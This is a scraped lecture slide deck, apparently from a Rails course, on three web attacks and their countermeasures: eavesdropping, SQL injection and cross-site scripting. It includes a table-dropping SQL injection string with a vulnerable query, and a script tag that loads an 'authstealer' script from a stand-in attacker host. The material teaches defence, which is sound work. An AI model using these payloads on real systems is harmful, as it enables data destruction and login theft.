http xkcd com327 Security Attacks Countermeasures Three Common
![Imagine controller that looks up students by name id = params[: id] # =>](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-12.jpg "Imagine controller that looks up students by name id = params[: id] # =>")
![Imagine controller that looks up students by name id = params[: id] # =>](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-13.jpg "Imagine controller that looks up students by name id = params[: id] # =>")
![What if…? id = params[: id] # => "Robert'; DROP TABLE students; --" …](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-14.jpg "What if…? id = params[: id] # => \"Robert'; DROP TABLE students; --\" …")
![What if…? id = params[: id] # => "Robert'; DROP TABLE students; --" …](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-15.jpg "What if…? id = params[: id] # => \"Robert'; DROP TABLE students; --\" …")
![How to prevent SQL injection? id = params[: id] # => "Robert'; DROP TABLE](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-16.jpg "How to prevent SQL injection? id = params[: id] # => \"Robert'; DROP TABLE")
![How to prevent SQL injection? id = params[: id] # => "Robert'; DROP TABLE](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-17.jpg "How to prevent SQL injection? id = params[: id] # => \"Robert'; DROP TABLE")
![Translation becomes… id = params[: id] # => "Robert'; DROP TABLE students; --" …](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-18.jpg "Translation becomes… id = params[: id] # => \"Robert'; DROP TABLE students; --\" …")
![Translation becomes… id = params[: id] # => "Robert'; DROP TABLE students; --" …](https://slidetodoc.com/presentation_image_h2/64b494f3443dca598aeae67959b2d1ed/image-19.jpg "Translation becomes… id = params[: id] # => \"Robert'; DROP TABLE students; --\" …")
- Slides: 29
http: //xkcd. com/327/ Security: Attacks & Countermeasures
Three Common Web App Attacks and Countermeasures I’ll unfold them one by one…
What potential attack happens here? Browser Ye Olde Internet Rails Router Controller View Model DB
What potential attack happens here? Browser Eavesdropping, packet sniffing, man-in-the-middle Ye Olde Internet Rails Router Controller View Model DB
Example: Unsecured Sign-Up Page Trivial for packet sniffer to steal
Browser How to prevent? Ye Olde Internet Rails Router Controller View Model DB
Browser How to prevent? Encrypt communications with SSL (HTTPS) Ye Olde Internet Rails Router Controller View Model DB
How to enable site-wide SSL in Rails • Also requires config on production server – E. g. : Signed certificate Taken from https: //www. railstutorial. org/book/ (3 rd Ed. ) Listing 7. 26 See also http: //guides. rubyonrails. org/configuring. html#rails-general-configuration
Three Common Web App Attacks and Countermeasures • Attack: Eavesdropping on network communications – Countermeasure: Encrypt communications with SSL
http: //xkcd. com/327/ Why were the student records lost?
http: //xkcd. com/327/ Why were the student records lost? The name string “Robert'); DROP TABLE Students; --” injected malicious code But how can this happen?
Imagine controller that looks up students by name id = params[: id] # => "Robert" … Student. where("name = '#{id}'")
Imagine controller that looks up students by name id = params[: id] # => "Robert" … Student. where("name = '#{id}'") Rails ORM translates to… SELECT * FROM students WHERE name = 'Robert';
What if…? id = params[: id] # => "Robert'; DROP TABLE students; --" … Student. where("name = '#{id}'")
What if…? id = params[: id] # => "Robert'; DROP TABLE students; --" … Student. where("name = '#{id}'") SELECT * FROM students WHERE name = 'Robert'; DROP TABLE students; --';
How to prevent SQL injection? id = params[: id] # => "Robert'; DROP TABLE students; --" … Student. where("name = '#{id}'")
How to prevent SQL injection? id = params[: id] # => "Robert'; DROP TABLE students; --" … Student. where("name = '#{id}'") Write like this! Student. where("name = ? ", id) Automatically escapes input
Translation becomes… id = params[: id] # => "Robert'; DROP TABLE students; --" … Student. where("name = ? ", id)
Translation becomes… id = params[: id] # => "Robert'; DROP TABLE students; --" … Student. where("name = ? ", id) SELECT * FROM students WHERE name = 'Robert'; DROP TABLE students; --';
Three Common Web App Attacks and Countermeasures • Attack: Eavesdropping on network communications – Countermeasure: Encrypt communications with SSL • Attack: SQL injection – Countermeasure: Use escaped queries
Micropost Example: What if…?
Micropost Example: What if…? ts s o p r e s U Blah blah… <script src="http: //mallorysevilsite. com/authstealer. js">
Malicious script runs when feed loads! Blah blah… <script src="http: //mallorysevilsite. com/authstealer. js">
How to prevent cross-site scripting (XSS)?
How to prevent cross-site scripting (XSS)? • Use Rails! – Hartl: “Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates. ” <script src="http: //mallorysevilsite. com/authstealer. js"> ERB translates variable values to… < script src=" http: //mallorysevilsite. com/authstealer. js" >
Three Common Web App Attacks and Countermeasures • Attack: Eavesdropping on network communications – Countermeasure: Encrypt communications with SSL • Attack: SQL injection – Countermeasure: Use escaped queries • Attack: Cross-site scripting (another type of injection) – Countermeasure: Use Rails (escape text) Although these attacks are common, there are many more (e. g. , cross-site request forgery – see Hartl Ch. 3)
CERT Top 10 Software Security Practices 1. Validate input 2. Heed compiler warnings 3. Architect and design for security policies 4. Keep it simple 5. Default deny 6. Adhere to the principle of least privilege 7. Sanitize data sent to other software 8. Practice defense in depth 9. Use effective quality assurance techniques 10. Adopt a software construction security standard Taken from https: //www. securecoding. cert. org/
For more attacks and countermeasures, see the Rails Security Guide http: //guides. rubyonrails. org/security. html
Summary • • Encrypting communication with SSL SQL injection attacks XSS attacks CERT security practices http: //flic. kr/p/a. CLor 3
Cache attacks and countermeasures: the case of aes
Cyber security threats and countermeasures
Guide to network defense and countermeasures
Guide to network defense and countermeasures
Csrf countermeasures
Spill prevention control & countermeasures training
Guide to network defense and countermeasures
Ark ping
Security attacks services and mechanisms
Provate security
Https://xkcd.com/327/
Xkcd sql injection
Http //mbs.meb.gov.tr/ http //www.alantercihleri.com
Siat ung sistem informasi akademik
Rsa timing attack
Attacks on bilingualism represent an ethnocentric
Lest we remember: cold boot attacks on encryption keys
Cross-container attacks
Deauth attack
What is an attacker's goal in hijacking attacks?
Malicious attacks threats and vulnerabilities
Sebastian szyller
Paralleism
Hijacking attacks
Neur ips
Layer 2 attacks
Zero-day attacks
Zero-day attacks
Icd 10 anxietas
Hijacking attacks
